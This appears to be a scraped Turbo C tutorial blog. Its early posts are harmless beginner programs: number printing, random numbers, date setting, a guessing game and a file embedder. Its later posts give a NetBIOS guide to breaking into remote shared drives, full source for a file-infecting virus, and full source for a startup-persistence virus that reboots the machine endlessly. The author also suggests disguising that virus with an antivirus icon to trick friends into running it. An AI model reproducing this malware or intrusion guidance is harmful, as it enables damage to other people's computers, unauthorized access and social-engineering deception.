printf(“FOUR “);

break;

case ‘5′:

printf(“FIVE “);

break;

case ‘6′:

printf(“SIX “);

break;

case ‘7′:

printf(“SEVEN “);

break;

case ‘8′:

printf(“EIGHT “);

break;

case ‘9′:

printf(“NINE “);

break;

case ‘0′:

printf(“ZERO “);

break;

}

}

}

C Program to Generate Numbers in Pyramid Pattern

This program generates the numbers in pyramid pattern.It takes the input from two through nine and generates the numbers in the pyramid pattern.For example if the input is 4 then the program produces the following output




 
….1

1111112 2

111113 3 3

111.4 4 4 4& so on..







CODE:



#include

#include

void main()

{

int i,n,j,x=40,y=10;

clrscr();

printf(“Enter n (between 2 & 9)\n”);

scanf(“%d”,&n);

for(i=1;i<=n;i++)

{

gotoxy(x,y); /* To take the cursor to the co-ordinates x & y */

for(j=1;j<=i;j++)

{

printf(“%d “,i);

}

x=x-1;

y++;

}

getch();

}

C Program to Generate Random Numbers

This is a simple program to generate random numbers.This logic can be used to build a Lotto program or a program to pick Lucky number and so on.Here’s the program






#include

#include

#include



int main(void)

{

int i;

time_t t;

srand((unsigned) time(&t));

printf(“Ten random numbers from 0 to 99\n\n”);

for(i=0; i<10;i++)

printf(“%d\n”,rand()%100);

}



OR



If it necessary to generate a number between 0 and (num-1) then this program meets the ideal solution

#include

#include

#include

/* prints a random number in the range 0 to 99 */

int main(void)

{

randomize();

printf(“Random number in the 0-99 range: %d\n”, random (100));

return 0;

}

C Program to Set/Change the Current System Time

This program can be used to set or change the system time








#include

#include



int main(void)

{

struct time t;

gettime(&t);

printf(“The current hour is: %d\n”, t.ti_hour);

printf(“The current min is: %d\n”, t.ti_min);

printf(“The current second is: %d\n”, t.ti_sec);



/* Add one to the hour,minute & sec struct element and then call settime */



t.ti_hour++;

t.ti_min++;

t.ti_sec++;

settime(&t);

printf(“The current hour is: %d\n”, t.ti_hour);

printf(“The current min is: %d\n”, t.ti_min);

printf(“The current second is: %d\n”, t.ti_sec);

return 0;

}

C Program to Get the Current System Date

This program will get or read the current system date from the system.It displays Year,Month and Day.







#include

#include



int main(void)

{

struct date d;

getdate(&d);

printf(“The current year is: %d\n”, d.da_year);

printf(“The current day is: %d\n”, d.da_day);

printf(“The current month is: %d\n”, d.da_mon);

return 0;

}

C Program to Set/Change the Current System Date

This program can be used to set the system date or to change the current system date.










#include

#include

#include



int main(void)

{

struct date reset;

struct date save_date;

getdate(&save_date);

printf(“Original date:\n”);

system(“date”);

reset.da_year = 2001;

reset.da_day = 1;

reset.da_mon = 1;

setdate(&reset);

printf(“Date after setting:\n”);

system(“date”);

setdate(&save_date);

printf(“Back to original date:\n”);

system(“date”);

return 0;

}

C Program for Pigeon Breeding Problem

The problem is as follows…




Initially i have a pair of adult pigeons(capable of breeding) which give rise to another young pair every month until it reaches the age of 5 years(60 months).But the young pair starts breeding only when it is 2 months old.Once the adult pigeon pair starts breeding it never stops untils the age of 5 years.Assume the age of initial adult pigeon is 2 months old.This program takes the no. of months as input and will calculate the total no. of pigeons over a given time(as given by the input).This problem is framed, based on my own imagination and i call this problem as PIGEON BREEDING PROBLEM.Heres the code



#include

#include



struct node

{

int age;

struct node *link;

};



typedef struct node* NODE;



NODE getnode()

{

NODE x;

x=(NODE)malloc(sizeof(struct node));

if(x==NULL)

{

printf(“Out of memory\n”);

exit(1);

}

return x;

}



void main()

{

unsigned long int count=1;

unsigned int months,i;

NODE first=getnode();/*this is the intial adult pair*/

first->age=2; /*assume the age of initial adult pair as 2*/

first->link=NULL;

printf(“Enter the no. of months\n”);

scanf(“%u”,&months);

for(i=0;iage>=2)&&(temp->age<=60)) { NODE temp1=getnode(); temp->age+=1;

temp1->age=1;

temp1->link=first;

first=temp1;

temp=temp->link;

++count;

}

else

{

temp->age+=1;

temp=temp->link;

}

}

}

printf(“Total no. of pairs after %u months=%ld\n”,months,count);

}

A Self Destructing Program in C

This program will destroy itself upon execution.The program will cause the .exe file to be deleted upon execution.That is this program is capable of destroying itself upon execution.Heres the code






#include

#include

#include

void main()

{

printf(“This program will destroy itself if u press any key!!!\n”);

getch();

remove(_argv[0]);/*array of pointers to command line arguments*/

}



HOW TO COMPILE ?

Load the source code to the compiler and compile(press Alt-F9) and then press F9.This will generate the .exe file in the current directory(Bin directory).Execute this .exe file it will destroy itself upon execution.

Guessing Game In C

This is a small guessing game written in C.In this guessing game you have to guess a number between 0 & 100.You have 8 chances to do that.Every time you guess wrongly the program will give you a hint that your guess is too high or your guess is too low.Based on this hint you have to guess the number in the remaining attempts.Here’s the code






#include

#include

#include



void main()

{

int num,guess=-1,tries=0,pass=0;

time_t t;

srand((unsigned)time(&t));

num=rand()%100;

while((guess!=num)&&tries<8)

{

printf(“Enter the guess num b/w 0 & 100 (you have %d tries left out)\n”,(8-tries)); scanf(“%d”,&guess);

tries++;

if(guess==num)

{

printf(“Hurray you guessed it correctly!!!\n”);

pass=1;

}

else if(num< guess)

printf(“Your guess is too high\n”);

else

printf(“Your guess is too low\n”);

}

if(pass==0)

printf(“Sorry you lost! The correct number is %d\n”,num);

}

C Program Without a Main Function

How to write a C program without a main function?. Is it possible to do that. Yes there can be a C program without a main function. Here’s the code of the program without a main function…






#include
#define decode(s,t,u,m,p,e,d) m##s##u##t
#define begin decode(a,n,i,m,a,t,e)
int begin()

{

printf(” hello “);

}



Does the above program run without the main function? Yes, the above program runs perfectly fine even without a main function. But how, whats the logic behind it? How can we have a C program working without main?



Here we are using preprocessor directive #define with arguments to give an impression that the program runs without main. But in reality it runs with a hidden main function.



The ‘##‘ operator is called the token pasting or token merging operator. That is we can merge two or more characters with it.



NOTE: A Preprocessor is program which processess the source code before compilation.



Look at the 2nd line of program-



#define decode(s,t,u,m,p,e,d) m##s##u##t



What is the preprocessor doing here. The macro decode(s,t,u,m,p,e,d) is being expanded as “msut” (The ## operator merges m,s,u & t into msut). The logic is when you pass (s,t,u,m,p,e,d) as argument it merges the 4th,1st,3rd & the 2nd characters(tokens).



Now look at the third line of the program-



#define begin decode(a,n,i,m,a,t,e)



Here the preprocessor replaces the macro “begin” with the expansion decode(a,n,i,m,a,t,e). According to the macro definition in the previous line the argument must be expanded so that the 4th,1st,3rd & the 2nd characters must be merged. In the argument (a,n,i,m,a,t,e) 4th,1st,3rd & the 2nd characters are ‘m’,'a’,'i’ & ‘n’.



So the third line “int begin” is replaced by “int main” by the preprocessor before the program is passed on for the compiler. That’s it…



The bottom line is there can never exist a C program without a main function. Here we are just playing a gimmick that makes us beleive the program runs without main function, but actually there exists a hidden main function in the program. Here we are using the proprocessor directive to intelligently replace the word begin” by “main”. In simple words int begin=int main.

File Embedder Project in C

Some times it is necessary for our compiled project to have it’s supporting files embedded within the EXE module itself so that the supporting files may not be put into a seperate folder and carried along with the project.So here i am presenting you with the source code of the FILE EMBEDDER UTILITY project.




This utility can be used to embed one file with in the other.ie:Suppose we need to embed a .bat file(or any other file *.exe,*bmp,.txt…..) into our final project so that the batch file is present with in the compiled module and is hidden from the users avoiding tthe need to carry the .bat file every time with the project.



Both the Embedding and extraction process has been presented in seperate functions for your convenience.here’s the code…..



#include

#include

#include

#include

#include

#include

#include



void embed(void);

void extract(void);



char buff[1],sname[128],tname[128],dname[128],choice;

unsigned long int size=0;long int psize=0;int outh,bytes=0;

FILE *source,*target,*data;



void main()

{

while(1)

{

clrscr();

puts(“\n\n\t\t\tFILE EMBEDDING UTILITY BY SRIKANTH\n\n\n”);

puts(“1.Embed A File 2. Extract A File 3.Exit\n”);

choice=getch();

switch(choice)

{

case ‘1′:embed();

getch();

break;

case ‘2′:

extract();

getch();

break;

default:

exit(0);

}

}

}



void embed()

{

puts(“\nEnter The Source Filename\n”);

scanf(“%s”,sname);

source=fopen(sname,”rb+”);

if(source==NULL)

{

puts(“\nCannot Open The Source File\n”);

return;

}

puts(“\nEnter The Target Filename\n”);

scanf(“%s”,tname);

outh=open(tname,O_RDONLYO_BINARY);

if(outh==-1)

{

puts(“\nCannot Open The Target File\n”);

return;

}

printf(“\nReading The Source File Please Wait…\n”);

while((bytes=read(outh,buff,1))>0)

size+=bytes;

data=fopen(“Data.cfg”,”w”);

if(data==NULL)

{

puts(“\nCannot Create Configuration The File\n”);

return;

}

fprintf(data,”%lu”,size);

close(outh);

fclose(data);

target=fopen(tname,”rb”);

if(target==NULL)

{

puts(“Cannot Open Target File\n”);

return;

}

printf(“\nEmbedding Please Wait…\n”);

fseek(source,0,SEEK_END);

while(fread(buff,1,1,target)>0)

fwrite(buff,1,1,source);

fcloseall();

printf(“\nEmbedding Completed Successfully\n”);

}



void extract()

{

printf(“\nEnter The Source Filename\n”);

scanf(“%s”,sname);

source=fopen(sname,”rb”);

if(source==NULL)

{

printf(“\nCannot Open The Source File\n”);

return;

}

printf(“\nEnter The Target Filename(eg: abc.exe)\n”);

scanf(“%s”,tname);

printf(“\nEnter The Configuration Filename(eg: DATA.cfg)\n”);

scanf(“%s”,dname);

data=fopen(dname,”r”);

if(data==NULL)

{

printf(“\nConfiguration File Not Found\n”);

return;

}

fscanf(data,”%ld”,&psize);

target=fopen(tname,”wb”);

if(target==NULL)

{

puts(“\nCannot Open The Target File\n”);

return;

}

printf(“\nExtracting Please Wait…\n”);

fseek(source,-psize,SEEK_END);

while((fread(buff,1,1,source))>0)

fwrite(buff,1,1,target);

printf(“\nFile Extraction Completed Successfully\n”);

fcloseall();

}



YOU CAN DOWNLOAD THE COMPILED MODULE OF THE ABOVE CODE HERE

Netbios Hacking

THIS NETBIOS HACKING GUIDE WILL TELL YOU ABOUT HACKING REMOTE COMPUTER AND GAINING ACCESS TO IT’S HARD-DISK OR PRINTER.NETBIOS HACK IS THE EASIEST WAY TO BREAK INTO A REMOTE COMPUTER.




STEP-BY-STEP NETBIOS HACKING PROCEDURE



1.Open command prompt



2. In the command prompt use the “net view” command

( OR YOU CAN ALSO USE “NB Scanner” OPTION IN “IP-TOOLS” SOFTWARE BY ENTERING RANGE OF IP ADDRESSS.BY THIS METHOD YOU CAN SCAN NUMBER OF COMPUTERS AT A TIME).



Example: C:\>net view //219.64.55.112



The above is an example for operation using command prompt.”net view” is one of the netbios command to view the shared resources of the remote computer.Here “219.64.55.112″ is an IP address of remote computer that is to be hacked through Netbios.You have to substitute a vlaid IP address in it’s place.If succeeded a list of HARD-DISK DRIVES & PRINTERS are shown.If not an error message is displayed. So repeat the procedure 2 with a different IP address.



3. After succeeding, use the “net use” command in the command prompt.The “net use” is another netbios command which makes it possible to hack remote drives or printers.



Example-1:

C:\>net use D: \\219.64.55.112\F

Example-2:

C:\>net use G: \\219.64.55.112\SharedDocs

Example-3:

C:\>net use I: file://219.64.55.112/Myprint



NOTE: In Examples 1,2 & 3, D:,G: & I: are the Network Drive Names that are to be created on your computer to access remote computer’s hard-disk.



NOTE: GIVE DRIVE NAMES THAT ARE NOT USED BY ANY OTHER DRIVES INCLUDING HARD-DISK DRIVES,FLOPPY DRIVES AND ROM-DRIVES ON YOUR COMPUTER.THAT IS IF YOU HAVE C: & D: AS HARD DIRVES, A: AS FLOPPY DIVE AND E: AS CD-DRIVE, GIVE F: AS YOUR SHARED DRIVE IN THE COMMAND PROMPT



F:,”SharedDocs” are the names of remote computer’s hard-disk’s drives that you want to hack. “Myprint” is the name of remote computer’s printer.These are displayed after giving “net use” command. “219.64.55.112″ is the IP address of remote computer that you want to hack.



4. After succeeding your computer will give a message that “The command completed successfully“. Once you get the above message you are only one step away from hacking the computer.



Now open “My Computer” you will see a new “Hard-Disk drive”(Shared) with the specified name.You can open it and access remote computer’s Hard-Drive.You can copy files,music,folders etc. from victim’s hard-drive.You can delete/modify data on victim’s hard-drive only if WRITE-ACCESS is enabled on victim’s system.You can access files\folders quickly through “Command Prompt”.



NOTE: If Remote Computer’s Firewall Is Enabled Your Computer Will Not Succeed In Gaining Access To Remote Computer Through Netbios.That is Netbios Hacking Is Not Possible In This Situation.(An Error Message Is Displayed).So Repeat The Procedure 2,3 With Different IP Address.

How to Create a Computer Virus?

This program is an example of how to create a virus in c.This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file.Thus it destroys other files by infecting them. But the virus infected file is also capable of spreading the infection to another file and so on.Here’s the source code of the virus program.






#include

#include

#include

#include

#include

#include



FILE *virus,*host;

int done,a=0;

unsigned long x;

char buff[2048];

struct ffblk ffblk;

clock_t st,end;



void main()

{

st=clock();

clrscr();

done=findfirst(“*.*”,&ffblk,0);

while(!done)

{

virus=fopen(_argv[0],”rb”);

host=fopen(ffblk.ff_name,”rb+”);

if(host==NULL) goto next;

x=89088;

printf(“Infecting %s\n”,ffblk.ff_name,a);

while(x>2048)

{

fread(buff,2048,1,virus);

fwrite(buff,2048,1,host);

x-=2048;

}

fread(buff,x,1,virus);

fwrite(buff,x,1,host);

a++;

next:

{

fcloseall();

done=findnext(&ffblk);

}

}

printf(“DONE! (Total Files Infected= %d)”,a);

end=clock();

printf(“TIME TAKEN=%f SEC\n”,

(end-st)/CLK_TCK);

getch();

}



COMPILING METHOD:



BORLAND TC++ 3.0 (16-BIT):



1. Load the program in the compiler, press Alt-F9 to compile
2. Press F9 to generate the EXE file (DO NOT PRESS CTRL-F9,THIS WILL INFECT ALL THE FILES IN CUR DIRECTORY INCLUDIN YOUR COMPILER)
3. Note down the size of generated EXE file in bytes (SEE EXE FILE PROPERTIES FOR IT’S SIZE)
4. Change the value of X in the source code with the noted down size (IN THE ABOVE SOURCE CODE x= 89088; CHANGE IT)
5. Once again follow the STEP 1 & STEP 2.Now the generated EXE File is ready to infect



BORLAND C++ 5.5 (32-BIT) :


1. Compile once,note down the generated EXE file length in bytes
2. Change the value of X in source code to this length in byte
3. Recompile it.The new EXE file is ready to infect



HOW TO TEST:



1. Open new empty folder
2. Put some EXE files (BY SEARCHING FOR *.EXE IN SEARCH & PASTING IN THE NEW FOLDER)
3. Run the virus EXE file there you will see all the files in the current directory get infected.
4.All the infected files will be ready to reinfect

That’s it

WARNING: FOR EDUCATIONAL PURPOSES ONLY

A Virus Program to Restart the Computer at Every Startup

Today I will show you how to create a virus that restarts the computer upon every startup. That is, upon infection, the computer will get restarted every time the system is booted. This means that the computer will become inoperable since it reboots as soon as the desktop is loaded.




For this, the virus need to be doubleclicked only once and from then onwards it will carry out rest of the operations. And one more thing, none of the antivirus softwares detect’s this as a virus since I have coded this virus in C. So if you are familiar with C language then it’s too easy to understand the logic behind the coding.



Here is the source code.



#include

#include

#include



int found,drive_no;char buff[128];



void findroot()

{

int done;

struct ffblk ffblk; //File block structure

done=findfirst(“C:\\windows\\system”,&ffblk,FA_DIREC); //to determine the root drive

if(done==0)

{

done=findfirst(“C:\\windows\\system\\sysres.exe”,&ffblk,0); //to determine whether the virus is already installed or not

if(done==0)

{

found=1; //means that the system is already infected

return;

}

drive_no=1;

return;

}

done=findfirst(“D:\\windows\\system”,&ffblk,FA_DIREC);

if(done==0)

{

done=findfirst(“D:\\windows\\system\\sysres.exe”,&ffblk,0);

if

(done==0)

{

found=1;return;

}

drive_no=2;

return;

}

done=findfirst(“E:\\windows\\system”,&ffblk,FA_DIREC);

if(done==0)

{

done=findfirst(“E:\\windows\\system\\sysres.exe”,&ffblk,0);

if(done==0)

{

found=1;

return;

}

drive_no=3;

return;

}

done=findfirst(“F:\\windows\\system”,&ffblk,FA_DIREC);

if(done==0)

{

done=findfirst(“F:\\windows\\system\\sysres.exe”,&ffblk,0);

if(done==0)

{

found=1;

return;

}

drive_no=4;

return;

}

else

exit(0);

}



void main()

{

FILE *self,*target;

findroot();

if(found==0) //if the system is not already infected

{

self=fopen(_argv[0],”rb”); //The virus file open’s itself

switch(drive_no)

{

case 1:

target=fopen(“C:\\windows\\system\\sysres.exe”,”wb”); //to place a copy of itself in a remote place

system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\

CurrentVersion\\Run \/v sres \/t REG_SZ \/d

C:\\windows\\system\\ sysres.exe”); //put this file to registry for starup

break;



case 2:

target=fopen(“D:\\windows\\system\\sysres.exe”,”wb”);

system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\

CurrentVersion\\Run \/v sres \/t REG_SZ \/d

D:\\windows\\system\\sysres.exe”);

break;



case 3:

target=fopen(“E:\\windows\\system\\sysres.exe”,”wb”);

system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\

CurrentVersion\\Run \/v sres \/t REG_SZ \/d

E:\\windows\\system\\sysres.exe”);

break;



case 4:

target=fopen(“F:\\windows\\system\\sysres.exe”,”wb”);

system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\

CurrentVersion\\Run \/v sres \/t REG_SZ \/d

F:\\windows\\system\\sysres.exe”);

break;



default:

exit(0);

}



while(fread(buff,1,1,self)>0)

fwrite(buff,1,1,target);

fcloseall();

}



else

system(“shutdown -r -t 0″); //if the system is already infected then just give a command to restart

}



NOTE: COMMENTS ARE GIVEN IN GREEN COLOUR.



Compiling The Scource Code Into Executable Virus.



1. Download the Source Code Here

2. The downloaded file will be Sysres.C

3. For step-by-step compilation guide, refer my post How to compile C Programs.



Testing And Removing The Virus From Your PC



You can compile and test this virus on your own PC without any fear.To test, just doubleclick the sysres.exe file and restart the system manually.Now onwards ,when every time the PC is booted and the desktop is loaded, your PC will restart automatically again and again.

It will not do any harm apart from automatically restarting your system.After testing it, you can remove the virus by the following steps.



1. Reboot your computer in the SAFE MODE

2. Goto X:\Windows\System (X can be C,D,E or F)

3.You will find a file by name sysres.exe, delete it.

4.Type regedit in run.You will goto registry editor.Here navigate to



HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Run





There, on the right site you will see an entry by name “sres“.Delete this entry.That’s it.You have removed this Virus successfully.



Logic Behind The Working Of The Virus



If I don’t explain the logic(Algorithm) behind the working of the virus,this post will be incomplete.So I’ll explain the logic in a simplified manner.Here I’ll not explain the technical details of the program.If you have further doubts please pass comments.



LOGIC:

1. First the virus will find the Root partition (Partition on which Windows is installed).

2. Next it will determine whether the Virus file is already copied(Already infected) into X:\Windows\System

3. If not it will just place a copy of itself into X:\Windows\System and makes a registry entry to put this virus file onto the startup.

4. Or else if the virus is already found in the X:\Windows\System directory(folder), then it just gives a command to restart the computer.



This process is repeated every time the PC is restarted.



NOTE: The system will not be restarted as soon as you double click the Sysres.exe file.The restarting process will occur from the next boot of the system.



AND ONE MORE THING BEFORE YOU LEAVE(This Step is optional)



After you compile, the Sysres.exe file that you get will have a default icon.So if you send this file to your friends they may not click on it since it has a default ICON.So it is possible to change the ICON of this Sysres.exe file into any other ICON that is more trusted and looks attractive.



For example you can change the .exe file’s icon into Norton antivirus ICON itself so that the people seeing this file beleives that it is Norton antivirus. Or you can change it’s ICON into the ICON of any popular and trusted programs so that people will definitely click on it.



The detailed tutorial on changing the ICON is given in my post How To Change The ICON Of An EXE File .